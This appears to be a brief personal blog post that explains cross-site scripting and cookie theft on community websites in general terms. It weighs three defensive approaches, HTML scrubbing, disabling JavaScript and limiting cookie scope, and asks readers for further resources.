INXSS

My current headache is cross-site scripting, or XSS.

Cross-site scripting is an unforseen product of the combination of browser programmability and communally-updated websites. Javascript and XMLHttpRequest let your browser do all sorts of nifty things; community web sites let people build really nifty things; together they let bad people steal your ID.

Anyone can create a web page that will read your cookies, but browsers aren't stupid, and they will only cough up the cookies for that web site. Which was not a problem in the past, because before anyone could do anything untowards they had to take control of the website by some other means.

But if you have a community site where people can insert unfiltered HTML, that lets other people steal your cookies for that site. Badness.

The approaches to this problem seem to be threefold:

1. The listen-to-nanny approach, as typified by CERT: Tell people to turn off Javascript, and not to browse unknown web sites, especially after dark.

2. The patch-it-and-hope approach: Scrub the HTML for any untowards Javascript. If your site can restrict what users put up on their pages, you may be able to eliminate Javascript altogether - though even then, you might get tripped up the way MySpace was.

3. The keep-the-doors-and-windows-locked approach: Don't use cookies that give users global access. I think Blogger may be doing this, and that's why you keep having to log in to comment.

You have to do some of 2 in any case. If you don't scrub comments of bad HTML, you will find your page layouts corrupted in very short order. 3 looks likely to be the most robust, but at the cost of user functionality.

Anyone know of any in-depth resources on this? Or are people keeping their solutions close to their chests?

Posted by: Pixy Misa at 07:09 AM | Comments (1) | Add Comment | Trackbacks (Suck)
Post contains 299 words, total size 2 kb.